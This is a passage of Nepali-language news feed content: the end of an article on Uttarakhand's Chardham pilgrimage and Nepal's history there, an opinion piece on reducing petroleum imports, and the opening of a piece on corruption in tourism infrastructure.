चारधामलाई लिने गर्दछन ।
भारतको धार्मिक इतिहासमा चारधामको अवधारणा आदि शंकराचार्यले सुरु गरेका हुन । त्यतिबेला भारतमा विभिन्न मत र पन्थ फैलिँदा धार्मिक एकता कमजोर थियो । शंकराचार्यले चार दिशाका प्रमुख तीर्थलाई जोडेर चारधामको मार्ग बनाए । यी स्थान पहिले नै पवित्र थिए, तर उनले तिनलाई एउटै आध्यात्मिक यात्रामा व्यवस्थित गरे । त्यसैले चारधाम धार्मिक एकता र सांस्कृतिक समन्वयको प्रतीक बन्यो । शंकराचार्यको जन्म इस्वी सन ७८८ भारतको केरला राज्यको कालडी गाउँमा पिता शिवगुरु र माता आर्याम्बाको कोखबाट भएको हो । शंकराचार्यले कम उमेरमै वेद, उपनिषद र दर्शनशास्त्रमा अदभुत ज्ञान प्राप्त गर्नुभएको थियो । शकंराचार्यले ८ बर्षको उमेरमा गुरु गोविन्दपादबाट सन्यास लिएका थिए । शकंराचार्यको महासमाधि ३२ बर्षको उमेरमा इ.स.८२० मा भएको थियो । आदि शंकराचार्यको समाधिस्थलको केदारनाथमा रहेको मानिन्छ । शकंराचार्य उपाधि बिशेष गरी ८ औ शताब्दीमा महान हिन्दु दार्शनिक द्वारा सुरु गरिएको हो ।
उत्तराखण्डको चारधाम यात्रा गर्दा तीर्थाटन पर्यटकहरुले हरिद्वार वा ऋषिकेशमा गंगा स्नान गरेर यात्राको सुरुवात गर्दछन । यो चारधामको यात्रामा पर्यटकहरूले कुल १ हजार ६०७ किलोमिटर यात्रा गर्नु पर्ने हुन्छ । हरिद्वारदेखि सुरु हुने उत्तराखण्डको चारधाम यात्राको सुरुवात यमुनोत्री, गंगोत्री, केदारनाथ हुदै बद्रीनाथमा पुगेर सकिन्छ । यो चारधाम यात्रामा तीर्थाटनका पर्यटकहरूले हरिद्वारदेखि चारै धाम पुग्न र फर्कन कम्तीमा १० दिनको समय तय गर्नु पर्दछ । हरिद्वार÷ऋषिकेश चारधामको प्रवेशद्वार हो भन्दा पनि हुन्छ । पहिलोचोटी चारधामको यात्रामा जाने तीर्थाटनका पर्यटकहरूका लागि हरिद्वार र ऋषिकेशको इतिहासका बारेमा पनि जान्ने उत्सुकता हुन्छ । गंगा नदीको किनारमा रहेको हरिद्वार प्राचिन धार्मिक शहर हो । जसको इतिहास धार्मिक ग्रन्थहरूमा उल्लेख छ । हरिद्वार दुई शब्दबाट बनेको छ । हरि भगवान बिष्णु र द्वार ढोका अर्थात हरिकोद्वार । हरिद्वारमा १२ बर्षमा कुम्भ मेला पनि लाग्दछ । त्यसैले हरिद्वारलाई हिन्दु धर्ममा मोक्षद्वार पनि भनिन्छ । हरिद्वारको पौडीघाट पवित्र घाट हो । यहा प्रत्यक साझ गंगा आरती हुन्छ । अहिले हरिद्वारमा धार्मिक शहर मात्र नभएर योग आयुर्वेद र अध्यात्मिक शिक्षाको केन्द्र पनि भएको छ । त्यसैगरी ऋषिकेश ऋषिहरूको ध्यान स्थल अर्थात तपोभूमी पनि हो । ऋषिकेशमा गायत्री मन्त्रका प्रवर्तक ऋषि विष्णुक्षेय र गिरिजाशंकरले गंगा तटमा आश्रम स्थापना गरी तपस्या गरेको स्थल पनि हो । ऋषिकेशमा साधु समाज र अखडाहरू धेरै छन ।
उत्तराखण्डको यात्रामा इतिहासमा रुचि राख्ने तीर्थाटन पर्यटकहरूलाई ऐतिहासिक कुराको समेत अध्यन अवलोकन गराउछ । लिम्पियाधुरा, लिपुलेक र कालापानी समेटेर जारी गरेको चुच्चे नक्सा भित्रको भूमि सहजरुपमा नेपपालले प्रयोग गर्न नसकेको अवस्थामा इतिहास नपढेका कतिपय पर्यटकहरूलाई अहिले भारतको उत्तराखण्ड कुनै बेला नेपालको थियो भन्ने कुरा सुन्दा अचम्म मान्दछन । सुगौली सन्धि हुनु भन्दा पहिले नेपालको पश्चिमको सिमाना अहिले हिमाचल प्रदेशमा पर्ने काँगडा सम्म थियो । सन १८१४ देखि १८१६ सम्म चलेको नेपाल–अंग्रेज युद्धले सुगौली सन्धि भएको थियो । सन्धिपछि नेपालले आफ्नो सार्वभौमिकता बचाए युद्धमा विशाल नेपालको भूमि गुमाउनु परेको थियो । युद्धमा ब्रिटिश इष्ट इण्डिया कम्पनी सरकारले नेपालको मोरङ, मकवानपुर, बुटवल, अल्मोडा, कुमाउँ, नाहन, जैथक, मलाउँ, देउथल र नालापानीमा आक्रमण गरेको थियो ।
चारधाम यात्राले इतिहास पनि सम्झाउँछ । नेपाल एकिकरण अभियानको समयमा वि.स.१८४७ चैत्र ११ गते राजधानी अल्मोडा कब्जा भई कुमाउ राज्यपनि नेपालमा गाभिएको थियो । बडाकाजी अमरसिंह थापाको नेतृत्वमा अन्तिम डोटेली राजा दिप शाहीविरुद्ध नेपाली सेनाले बिजय गरेपछि स्वतः कालापानी आसपासको भूगोल महाकाली नदी आधा नेपाल र आधा कुमाउगढको भएको थियो । त्यसपछि महाकाली नदी तरी कुमाउ माथी हमला गर्दै अल्मोडा कब्जा गरी नेपाली सेनाले गढवालको राजधानी श्रीनगर पनि नियन्त्रणमा लिएको थियो । तर युद्धमा कागडाका राजा संसार चन्दले पञ्जावका राजा रणजीत सिंहसँग ठूलो सैन्य सहयोग लिएर हमला गरेपछि नेपाली सेना अगाडि बढन सकेन । देउथलको युद्धमा नेपाली सेनाको अगुवाइ गरेका सरदार भक्ति थापा पनि देउथलको मलाउ किल्लाको युद्धमा वीरगति प्राप्त गरेका थिए । त्यो समयमा अङग्रेजसँग युद्ध भएका अल्मोडा किल्ला बाहेक नालापानी, मलाउँ, कुमाउ, गढवाल, काँगडा र जैथकलगायतका धेरै गढी अझै पनि सुरक्षित छन ।
काँगडा किल्ला ऐतिहासिक तथा पुरातात्विक महत्वको स्थल हो । काँगडा किल्ला नेपालको महाकाली नदीबाट पश्चिम ७१६ किलोमिटर पश्चिममा पर्दछ । काँगडा राज्य नेपालीले कब्जा गर्दा त्यहाँका राजा संसार चन्द काँगडा ढुंगे किल्लाभित्र तीन वर्षसम्म थुनिएका थिए ।  राजा संसार चन्दले पंजावको राजा रणजित सिंहसँग ठूलो सैन्य सहयोग लिएर हमला गरेपछि नेपालीको नराम्रो हार भयो । त्यो युद्धमा सेनापति बडाकाजी अमरसिंह थापा नेपालतर्फको कमाण्डर थिए । त्योभन्दा अगाडि नै काजी नयनसिंह थापासहित तीन सय जति नेपाली सेनाले यसै किल्लामा वीरगति प्राप्त गरेका थिए । यो युद्ध नेपालीको पक्षमा हुन सकेन र यस भन्दा अगाडि नेपाली सेना बढन सकेन । पश्चिमी एकीकरण अभियान अन्त भयो । देउथलको युद्धमा नेपाली सेनाको अगुवाइ भक्ति थापाले गरेका थिए । सरदार भक्ति थापाले पनि देउथलको मलाउ किल्लाको युद्धमा वीरगति प्राप्त गरेका थिए ।
नालापानीको युद्ध नेपालले ब्रिटिश सरकारसँग लडेको पहिलो साहसिक युद्ध थियो । जसमा गोर्खाको घर अधीनमा इस्ट इन्डिया कम्पनी र नेपाली सेना बीच लडाइँं भएको थियो । नेपालको इतिहासमा उल्लेख गरिए अनुसार सन १८१४ अक्टोबर २२ का दिन अग्रेज सेनानायक जनरल गिलेस्पीले आफ्ना फौज लिएर देहरादुन प्रवेश गरेका थिए । देहरादुन कब्जा गर्ने अग्रेजहरूको योजना विफल पार्न नेपालका सेनापति अमरसिंह थापाले त्यस क्षेत्रको रक्षार्थ कप्तान बलभद्र कुँवरलाई खटाएका थिए । नालापानीको सबैभन्दा उच्च स्थानमा पर्ने खलङ्गा किल्लामा वीर बलभद्र कुँवरले आफ्ना नेपाली सिपाही, ग्रामीण महिला तथा केटाकेटी गरी करिब छ सय जनाको साथ बलभद्रले युद्धको तयारी गरेका थिए । नेपाली फौजसित हतियारका नाममा केही तोप, भरुवा बन्दुक, ढुङ्गामुढा, खुकुरी, धनुष बाण, भालाजस्ता साधनहरू मात्रै थिए । अग्रेजहरूका आधुनिक हतियार र सुसङ्गठित ठूलो फौजको सामना गर्नु नेपाली सेनालाई फलामको चिउरा चपाउनु बराबरको काम थियो ।
त्यसै बखत ३० अक्टोबरका दिन गिलेस्पीले आफ्ना मतहातमा भएका तीन हजार पाँचसय भन्दा बढी सेनाको साथमा किल्लामाथि आक्रमण सुरु गरे । किल्लातर्फ बढेका अंग्रेज फौजका केही अधिकृत जवान मात्र बाँच्न सफल भए । लेफिटनेन्ट एलिससहित अग्रेजका धेरै सेनाहरु युद्धमा मारिए । प्रथम प्रयास असफल भएपछि अग्रेजहरूले थप तयारी गरी दोस्रो पटक हमला गरे । दोस्रो पटक जनरल गिलेस्पीसमेत मारिए । गिलेस्पीको मृत्युपश्चात तितर वितर फौजको नेतृत्वका भार कर्नल माँबीले सम्भहाले माँबीको पटक–पटकको आक्रमण असफल भएपछि अङ्ग्रेजहरू युद्धद्वारा नेपाली वीर गोर्खालीलाई परास्त गर्ने आशा मारे । त्यसपछि अग्रेजहरूले कूटनीति अपनाई किल्लाभित्र गएर र पानीको मुहान थुनिदिए । अङ्ग्रेजहरूको उक्त धोकापूर्ण चालले नेपालीले पानीसमेत पिउन पाएनन । पानीको प्यासले किल्लाभित्र हाहाकार मच्चिन थाल्यो । बाहिरबाट शत्रुका तोपहरूको अग्निवर्षा जारी थियो भने भित्र सारा फौज प्यासले तडपिरहेका थिए । त्यस्तो दर्दनाक परिस्थितिमा जीवित रहेका बाँकी वीर सेनाको हितका लागि बलभद्रले स्वतः किल्ला छोडनुपरेको थियो ।
सन १८१४ नोभेम्बर ३० मा बलभद्रले किल्ला छोडेर जाँदा साथमा ७० जना जति मात्र बाँकी थिए । किल्लाको स्वतः त्यागपछि मात्र अङ्ग्रेजहरूको पाइला खलङ्गा किल्लासम्म पुग्न सकेको थियो । युद्ध पश्चात नेपालीहरूको पराक्रम र बहादुरीको प्रशंसा गर्दै अङ्ग्रेजहरूले एक युद्ध स्मारकको स्थापना गरे । उक्त स्मारकको शिलालेखमा लेखिएको छ । हाम्रा वीर शत्रु बलभद्र र उनका वीर गोर्खालीहरूको स्मृतिमा सम्मानोपहार हालको देहरादुन स्थित सहस्त्रधार रोडमा पर्ने स्मारक भारतीय पुरतत्व विभागको संरक्षणमा छ । यो विश्वभरिको एक मात्र त्यस्तो उदाहरणीय स्मारक मानिएको छ जहाँ कुनै सेनाद्वारा आफ्नो शत्रु सेनाको अदभूत वीरतालाई उल्लेख गरिएको छ । भारतको उत्तराखण्ड राज्य अन्तर्गत पर्ने देहरादुनको नालापानीमा पर्ने खलङ्गा किल्लाले नेपाल र नेपालीको गौरवमय इतिहास बोकेको छ । नेपाल–अंग्रेज युद्ध अन्ततः सन १८१६ मा समाप्त भयो । यस सन्धिअनुसार नेपालले आफ्नो ठूलो भूभाग गुमाउन पर्यो । कुमाउँ, गढवाल र अन्य पश्चिमी हिमाली क्षेत्र ब्रिटिस भारतमा गाभियो र उत्तराखण्डका चारधाम नेपालको सीमा बाहिर प¥यो ।
देहरादून उत्तराखण्ड राज्यको राजधानी र ऐतिहासिक शहर हो । देहरादूनको इतिहास लामो छ । देहरादुनले महाभारतकालदेखि आधुनिक ब्रिटिशकालसम्मको विरासत बोकेको छ । देहरादूनमा नेपाली मुलका धेरै मानिसहरू छन । कुमाउ, पिथौरागढ, अल्मोडा, चम्पावत, डीडीहाट लगायत ठाउँहरू नेपालमा विभिन्न जिल्लामा रहने धेरै थर गोत्रको मानिसहरूको मुल थलो पनि हो । देहरादून सांस्कृतिक, भौगोलिक, शैक्षिक तथा ऐतिहासिक दृष्टिकोणले पर्यटनका लागि महत्वपूण शहर हो । देहरादून पर्यटनका लागि तीर्थयात्री पर्यटकहरूले घुम्दा राम्रो हुन्छ । यहा मसूरी, सहस्त्रधारा, टप्केश्वर मन्दिररोबसै केभजस्ता पर्यटकीयस्थल छन । देहरादूनको मौसम र हिमालको दृष्यले सबैलाई लोभ्याउछ । यात्रामा देहरादून घुम्दा धेरै कुराको जानकारी हुन्छ । ऋषिकेशदेखि देहरादून करिवन ४२ किलो मिटर पर्दछ ।
यमुनोत्री उत्तराखण्डको गढवालको सबैभन्दा पश्चिमी क्षेत्रको मन्दिर हो । यमुनोत्री यमुना नदीको उदगमस्थल पनि हो । यो स्थान देवी यमुनाको मन्दिर र पवित्र तातोपानीका लागि परिचित छ । यमुना मन्दिर टिहरी गढवालका महाराज प्रताप शाहले निर्माण गराएका थिए । यमुनोत्रीमा तीर्थाटन पर्यटकहरू द्वारा पितृ कार्य गर्दछन । यात्राको क्रममा यमुनोत्री को तातोपानी कुण्डमा स्नान र यमुना मन्दिरमा दर्शन गरिन्छ । गंगोत्रीमा नेपालका बडाकाजी अमरसिंह थापाले निर्माण गराएको मन्दिर पनि छ । त्यसपछिको यात्रा हुन्छ उत्तरकाशिको । उत्तरकाशिमा विश्वनाथ मन्दिरको दर्शन हुन्छ । त्यो पछिको यात्रा हुन्छ केदारनाथको । केदारनाथ पुग्नको लागि मोटरमार्ग छाडेर २२ किलोमिटर उकालो पदयात्रा गर्नु पर्दछ । तर पदयात्रा गर्न नसक्ने तीर्थाटनका पर्यटकहरूका लागि पाल्ली, डोली, अथवा घोडा र खच्चडको सवार गरेर पनि केदारनाथको मन्दिरमा पुग्न सकिन्छ । केदारनाथ देखि जोशिमठ हुदै बद्रीनाथ पुगिन्छ । बद्रीनाथ नजिकैसम्म मोटरमार्ग पुगेको छ । तर पनि पदमार्गको यात्रा गर्न रुचाउने तीर्थाटनका पर्यटकहरूका लागि जोशिमठदेखि करिवन ३ किमीको पदयात्रामा बद्रीनाथको मन्दिरमा पुगिन्छ ।
उत्तराखण्डको चारधाम क्षेत्रमा बद्रीनाथ, केदारनाथ, रुद्रप्रयागमा पदयात्रा गर्न नसक्ने तीर्थयात्रीहरूलाई सेवादिन नेपाली मजदुरहरूको सख्या धेरै हुन्छन । चारधाममा काम गर्ने मजदुरहरूमा विशेषगरी सुदुरपश्चिम र कर्णाली प्रदेशका पहाडी जिल्लाका मानिसहरू हुन्छन । यी मजदुरहरूले तीर्थयात्री पर्यटकहरूलाई पाल्की र डोकोमा बोक्ने गर्दछन । गढवाल भाषामा डोकोमा बोक्नेहरूलाई कण्डीवाल र पाल्कीमा बोक्नेहरूलाई डण्डीवाल भन्ने गरिन्छ । त्यहा काम गर्ने मजदुरहरू उच्च जोखिममा काम गरिरहेका हुन्छन । चारधाम क्षेत्रमा कठिन भूगोल, छिनछिनमा बदलि रहने मौसम र अधारभुत सुरक्षाको अभावले गर्दा नेपाली मजदुरहरूका लागि चारधाम क्षेत्र जोखिमपूर्ण भएपनि छोटो अवधिमा राम्रो कमाई हुने हुदा तीर्थयात्री बोक्ने काममा नेपालीहरू धेरै लागेका छन ।
उत्तराखण्डका चारधाम तीर्थस्थलहरू आज भारतका धार्मिक केन्द्र भए पनि इतिहासको एउटा कालखण्डमा गोरखा साम्राज्यको प्रभाव क्षेत्रमा थिए । गोरखा विस्तार, ब्रिटिस साम्राज्यसँगको युद्ध, नालापानीदेखि कुमाउँसम्मको संघर्ष र अन्ततः सुगौली सन्धिले नेपालको पश्चिमी भूगोल परिवर्तन गरिदियो । आज तीर्थयात्रीहरू जब चारधाम पुग्छन, उनीहरू केवल धार्मिक दर्शन मात्र गर्दैनन इतिहासका पानाहरू पनि खोज्दछन । जहाँ धर्म, राजनीति र भूगोल एकअर्कोसँग गाँसिएका छन । यसैले चारधाम यात्रा नेपालीहरूका लागि आस्थाको मात्र होइन, इतिहास र स्मृतिको पनि यात्रा हो ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=48974 0
तेल बचाउन आवश्यक तर कसरी ?  https://www.antaranganews.com/?p=48922 https://www.antaranganews.com/?p=48922#respond Sat, 23 May 2026 00:24:10 +0000 https://www.antaranganews.com/?p=48922 पेट्रोलियम पदार्थबाट चल्ने मोटरसाइकल र गाडीहरूलाई विद्युतीयमा गाडीमा परिणत गर्न सकिने र गर्न थालिएको समेत जानकारी पाइयो । तर परिवर्तन गर्दा त नयांँ किन्दा लाग्ने जस्तै खर्च देखियो । यो योजना त्यति उपयोगी नहुन सक्छ । पेट्रोलियम पदार्थ किन्दा विदेशमा नै पैसा जान्छ । त्यसैले त्यो पैसा रोक्नको लागि घाटामा यी वस्तु उपलब्ध गराउनु वा कर कम गर्नु सधैं उपयुक्त नहुन सक्छ । यो कार्यले करबाट गर्न सकिने आवश्यक कार्यहरूमा असर पर्न सक्छ । अर्कोतर्फ जति सस्तो भयो त्यति नै ग्राहकले ज्यादा किन्नु स्वभाविक हो । त्यसैले विशेषत पेट्रोलियम पदार्थको मुल्य घाटा खाएर घटाउने र बेच्ने कार्य अनुचित पनि हुन सक्छ । बरु महंगो हुंदा कम प्रयोग गर्ने बाध्याताले गर्दा विदेशी मुद्रा भने केही हदसम्म पनि पनि बचत हुन्छ । यद्यपि यो कार्य गर्दा नागरिकको सहमति परोक्ष रुपमा भने पनि लिनु राम्रो हो । त्यसको राम्रो माध्यम सञ्चार नै हुन सक्छ ।
अहिलेको अवस्था मात्र होइन, पछि पनि आफ्नो देशमा नपाइने हुंदा पेट्रोलियम पदार्थको कम प्रयोग र विकल्पका बारे ध्यान दिन आवश्यक छ ।
प्रथमतः मोटरसाइकल चलाउने कार्यलाई निरुत्साहित गर्न आवश्यक छ तर त्यो रोकेर होइन । अहिले सय सिसिको मोटरसाइकलले नयांँ हुंँदा राम्रो सडक भएमा प्रति लिटर ७० किलोमिटरसम्म माइलेज दिने गर्छ । अहिलेको हिसावमा ७० किलोमिटरको पेटेलको मुल्य करिव २२० हुन्छ । यो रकमवाट दुई जना मानिस जान सक्छन् । अर्थात ७० किलोमिटरको यात्रामा एक व्यक्तिको लागि ११० खर्च हुन्छ । सत्तरी किलोमिटरको लागि सार्वजनिक सवारी साधनले करिव २५० रुपैयासम्म लिन्छन् । यसरी सामान्य बाइकमा जांदा हुने खर्च भन्दा डिजेलबाट चल्ने सार्वजनिक सवारी साधनको लागि भाडा ज्यादा पर्ने देखिन्छ । गाडीमा यात्रु पुरा हुंदा कमसेकम मोटरसाइकलको यात्रा भन्दा सार्वजनिक गाडीको यात्र सस्तो हुन पर्छ किनकि, सानो सवारी साधनको खर्च ज्यादा हुने गर्छ र पेट्रोलको खर्च डिजेलको भन्दा ज्यादा हुने गर्छ । यसरी मोटरसाइकलमा भन्दा ठूला सवारी साधनमा ज्यादा भाडा लाग्नु एकहदसम्म अनुचित हो ।
यसको मुख्य कारणमा यात्रु कम भए पनि चलाउने र गलत प्रतिस्पर्धा हुन् । भाडा ज्यादा लाग्नुको कारण गाडीका एभरेज प्यासेन्जरको अनुपातको हिसाब नै हो । यसलाई व्यवस्थित गर्न सकिन्छ । सडकमा विशेषत ज्यादा गाडी चल्ने स्थानमा पहिला छुटेको गाडी अर्को गाडी नआएसम्म रोक्ने र अर्को गाडी आएपछि दोश्रो गाडीमा रहेका यात्रुहरू अगाडीको गाडीमा जान चाहेमा गाडीहरू बिच व्यवस्थित समझदारी हुने गरेर जान दिने प्रष्ट व्यवस्था हुन सक्छ । यसले गर्दा गाडीहरू पूर्ण भारमा चल्न सक्छन् । यसले गर्दा यात्रा छिटो हुन्छ र कम यात्रु लिएर जाने अवस्था नियन्त्रित हुन्छ । जस्तै दोश्रो गाडीले आफू पुगेको ठाउँबाट सबै यात्रु पहिलो गाडीलाई दिंदा त्यो गाडी पनि अर्को गाडी नआउंदासम्म बस्न सक्छ । अर्को गाडी आएमा त्यसका यात्रु लिएर जान सक्छ । यदाकदा सञ्चारको माध्यमबाट विविध सहयोग हुन सक्छ ।
बिशेष अवस्थामा यात्रुबाहक बाहेकका अन्य गाडीहरूबाट पनि सुरक्षित रुपमा यात्रुलाई लग्न सकिने भएमा लग्न दिनु उपयुक्त हुन्छ । त्यो कार्य ट्यांकर, ट्क आदिबाट हुन सक्छ । बिचौलियाहरूले ज्यादा रकम लिएर त्यसको असर यात्रुहरू र गाडीवालालाई परेको छ भने त्यो पनि निराकरण गर्न तयार हुनै पर्छ । यी कार्यहरू गरेमा गाडी भाडा कम गर्न समेत सकिन्छ । गाडी भाडा कम गरेमा पेट्रोलको मुल्य ज्यादा हुंदा मानिसहरू सार्वजनिक यातायातमा नै चढ्ने संभावना हुन्छ । यो समयमा सरकारी तलब खाने कर्मचारीहरूलाई यातायातका साधनहरू र यातायातको लागि इन्धन नदिने बरु दिन पर्ने स्थानमा न्युनतम भाडा दिन सकिन्छ । यी समेत केही विकल्पहरूको प्रयोगले यही अवस्थामा पनि भाडा बढाउने होइन बरु घटाउन सकिन्छ । वाइकहरू कम चल्ने वातावरण भएमा र यात्रुहरूको पहिलो छनौट सार्वजनिक यातायात भएमा यात्रुहरू बढ्छन् । अन्यथा बाइकको यात्रा भन्दा सार्वजनिक गाडीको यात्रा महंगो भएपछि वाइक चढ्नु स्वभाविक देखिन्छ । त्यसैले यात्रु बढाउने र त्यसको लागि कठोर नै बनेर भाडा घटाउन सक्नु पर्छ । यो विशेष अवस्थामा निजी गाडीहरूलाई हतोत्साहित गर्न पनि सक्छि । पेट्रोल डिजेलवाट चल्ने निजी गाडीहरू चलाउंदा अतिरिक्त कर लिने व्यवस्था पनि विकल्प हुन सक्छ ।
अर्को विकल्प त इलेक्ट्कि सवारी साधन नै हो । मोटरसाइकलाई अस्थायी रुपमा नै भने पनि विस्थापित गर्ने उपाय महंगो इलोक्ट्रिक गाडी भने हुन सक्दैन । करिव ३५ किलोमिटरसम्मको यात्रा गर्नेहरूको संख्या हरेक दिन आधा जस्तो रहने गर्दछ । यो संख्यालाई मोटरसाइकल र अन्य साना सवारी साधनहरूबाट अलग गर्नको लागि महंगा इवाइक र इगाडीहरू विकल्प होइनन् । सामान्य मध्यमवर्गको लागि भारतीय सामान्य जोगाडमा आधारित रहेर गरिएका कार्यको अनुभवलाई ध्यान दिन सक्नु पर्छ । करिव १२ हजार नेपाली रुपैया पर्ने भारतीय साइकलहरूमा इलेक्ट्रिक मोटर राख्नाले त्यो साइकलको मुल्य करिव २५ हजार रुपैयासम्म हुन सक्छ । खर्च कम लाग्छ । यसमा राम्रोसंग मर्मतको ब्यवस्था हुने र व्याट्रीको उचित प्रवन्ध हुने हो भने विद्यतीय साइकल राम्रो इन्धन बचतको विकल्प बन्न सक्छ । यो माध्यमबाट देशमा करिव ५० प्रतिशत बाहिरबाट आउने इन्धनलाई रोक्न सकिन्छ । यसको लागि राज्यले भारतमा भए पनि ती साइकलहरु बनाउने र व्याट्री प्रयोग गर्ने बारे तालिमको लागि उचित प्रवन्ध गर्न सक्छ । भारत र चीनबाट सस्ता तर बलिया सामान्य अर्थात रफ टप साइकलहरू खरिद गर्ने व्यवस्था गर्न सक्छ । राज्यबाट काम ढिलो र भ्रष्टाचार हुने नै गरेकोले यसमा नागरिकहरूलाई र विदेशी कम्पनीहरूलाई नै प्रयोग गर्न सक्छ । सञ्चारको बर्तमान अवस्थाामा त्यसको लागि कतै जानै पदैैन । सञ्चार माध्यमहरूबाटै यही बसेर सबै कार्यहरू गर्न सकिन्छ ।
सरकारले ज्यादा समय खर्च नगरी र कर्म खर्च वा यथार्थमा नगन्य खर्चमा नै यो कार्य गर्न सक्छ । यी सामान्य व्यवस्थापनले मात्र पनि देशले विदेशबाट ल्याउने इन्धनलाई आधामा झार्न सकिन्छ । कतिपय कृषि कार्यमा परम्परागत गोरु तथा रांगा समेतको प्रयोगलाई आधुनिक प्रविधिसंग जोडेर गर्न सकिन्छ । जोत्ने तथा सामान ढुवानी समेतमा फरक शैली आउन सक्छन् । सम्भवत कृषि सामग्रीहरू नजिक लग्ने समेतका कार्यमा गोरु घोडा तथा रांगाहरूलाई प्रयोग गर्न सकिन्छ । सम्भवतः उकालो र हिलोमा यन्त्र चलाउने र समथर र ओरालो बाटोमा जनावरको शक्ति नै प्रयोग गर्ने प्रविधिकाबारेमा समेत सोच्न पर्ने बेला आएको छ । पेट्रोलियम पदार्थको प्रयोग प्रदुषण, गर्मी समेत धेरै विकृतीहरूको कारण बनेकोमा कुनै दुविधा पनि छैन ।
त्यस्तै नागरिकलाई बाल्न मिल्ने दाउरा आदि बाल्न प्रोत्साहित गर्ने, धुवा कम हुने, विजुलीबाट सानो पंखा लगाएर बाल्नको लागि प्रयत्न गरिरहन नपर्ने चुलाहरूको प्रचार गर्ने जस्ता कार्य हुन आवश्यक छ । त्यस्तै जंगलमा पातहरू झर्छन् । ती झरेका पातहरूलाई मेसिनबाट दाउरा जस्तो बनाउन सकिने रहेछ । त्यस्ता मेसिनहरू प्रचारमा आएका छन् र ती सस्ता र सामान्य छन् । तिनको प्रयोग गरेर दाउरा बनाउनाले जंगलको सुरक्षा र आगोबाट हुने क्षति कम हुन्छन् । होटल, होस्टल, क्यान्टिन, सेना, प्रहरी तथा धेरै मानिसहरूले नियमित खाना खाने स्थानमा ती प्रयोग हुन सक्छन् । सोलार र व्याट्रीको प्रयोग सस्तो बनाएमा मोटरवाट पानी निकाल्ने र साना कृषि कार्य पनि गर्न सकिन्छ । यसबाट विदेशमा पैसा जानबाट रोक्न सकिन्छ । पर्यावरण राम्रो हुन्छ । स्वदेशी बस्तुको सदुपयोग हुन्छ । वन जोगिन्छ ।
कठोर भएर भन्नै पर्छ कि बाइकलाई हतोत्साहित गर्नै पर्ने देखिएको छ । सवारी साधनहरूमा युवाहरूको मृत्युको मुख्य कारण वाइक नै देखिन्छ । विद्युत साइकल ज्यादा प्राप्त हुने हो र स्पिड ३० किलोमिटर प्रतिधन्टा भन्दा ज्यादा नराख्ने हो तथा मुल्य सस्तो गरेर आवश्यकता अनुसार राज्यले नै केही अनुदान दिने हो भने तराईदेखि पहाड र हिमालसम्म सडक भएको स्थानमा विद्युत साइकलमात्र चलाउने व्यवस्था गर्न सकिन्छ । टाढाको यात्रामा सस्तो भाडामा सार्वजनिक गाडी पाउने र सस्तोमा नै भाडामा अन्यत्र विद्युतीय साइकल पाइने परिपाटीको विकास हुने हो भने बाइकलाई धेरै नै हतोत्साहित गर्न सकिन्छ । विद्युत स्टोभको प्रयोगलाई पनि सबैको पहुंचमा ल्याउने र राज्यले केही भने पनि रकम दिने हो भने ग्यासको प्रयोग समेत कम हुन्छ । राज्यले सबै नागरिकलाई विद्युत चुलो केही सहुलियतमा दिन सक्ने हो र ग्यास सिलिन्डरमा कुनै प्रकारले छुट दिने अर्थात लागत मुल्य भन्दा कममा नबेच्ने हो भने पनि राज्यले आफ्नो कार्यको जस्टिफिकेसन स्वदेशी विद्युत प्रयोगलाई प्रोत्साहित गर्न भनेर दिन सक्छ र नागरिकहरू पनि त्यसमा सहयोगी हुन आवश्यक छ । अहिले साना आकारमा समेत गोबर ग्यास बनाउने प्लास्टिकका ट्यांकीहरू बनेका भारतमा पनि देखिएका छन् । ती ट्यांकीहरूको प्रयोग साह्रै सस्तो हुने र ती गोवर ग्यास प्लान्टहरू शहरी क्षेत्रमा पनि बनाउन सकिने देखिएको छ । यो विद्युतीय चुलो र ग्यासबाट खाना बनाउने बानी पार्ने अवसर पनि हो । ती नेपालमा पनि बन्न सक्छन् । यी सवै कार्य साथमा हुने हो भने देशमा बाहिरी इन्धनको खर्च आधा भन्दा कम हुन सक्छ । साथै यो राज्यलाई सकारात्मक कार्य गर्ने सुअवसर पनि हुन सक्छ ।
फोटो : एजेन्सी ।
]]>
https://www.antaranganews.com/?feed=rss2&p=48922 0
पर्यटनको क्षेत्र : पूर्वाधार विकास र नीतिगत भ्रष्टाचार https://www.antaranganews.com/?p=48890 https://www.antaranganews.com/?p=48890#respond Thu, 21 May 2026 01:14:34 +0000 https://www.antaranganews.com/?p=48890 पर्यटन भन्ना साथ अहिले जनप्रतिनिधिहरूको मुखैमा झुण्डिएको छ पर्यटनको पूर्वाधार । पर्यटनको विकासमा पूर्वाधारको कुरालाई सभा, गोष्ठी र सेमिनारमा बोल्ने क्रममा जनप्रतिनिधिहरूले धेरै कुरा उठाउछन । योजना तर्जुमा गर्दा पर्यटन क्षेत्रको विकासका लागि पूर्वाधारमा बजेट बिनियोजित गरेका हुन्छन । पूर्वाधारको काम गर्दा भरसक अमानतमा नै गर्न खोज्छन । त्यसपछि काम लगाउँदा आफ्नो पार्टीको मान्छे, त्यसमा पनि आपूm निकटको नातागोता त्यो नभए आफ्नो नजिकको मानिसलाई काम दिने गर्दछन । यो हो नियोजित भ्रष्टाचार अर्थात पूर्वाधार विकासमा भइरहेको बेथितिको चित्रण ।
पर्यटन देशको आर्थिक समृद्धि, रोजगारी सिर्जना, सांस्कृतिक संरक्षण र अन्तर्राष्ट्रिय पहिचानसँग जोडिएको संवेदनशील क्षेत्र हो । हाम्रो जस्तो प्राकृतिक, धार्मिक र सांस्कृतिक सम्पदाले भरिपूर्ण मुलुकमा पर्यटन पूर्वाधारको विकासलाई अत्यन्त महत्वपूर्ण मानिन्छ । सडक, पदमार्ग, विश्रामस्थल, होटल, खानेपानी, शौचालय, सूचना केन्द्र, केबलकार, विमानस्थल, फनपार्क, धार्मिक संरचना, संग्रहालय आदि पर्यटन पूर्वाधारका मुख्य आधार हुन । तर यिनै पूर्वाधार निर्माणका नाममा धेरै ठाउँमा जनप्रतिनिधि, ठेकेदार र कर्मचारीबीचको मिलेमतोमा भ्रष्टाचार हुने गरेको छ । पूर्वाधारको योजनाको छनोटमै राजनीतिक स्वार्थ जोडिएको हुन्छ । धेरै स्थानीय तहमा पर्यटनसँग प्रत्यक्ष सम्बन्ध नभएका योजनालाई पनि पर्यटन पूर्वाधार 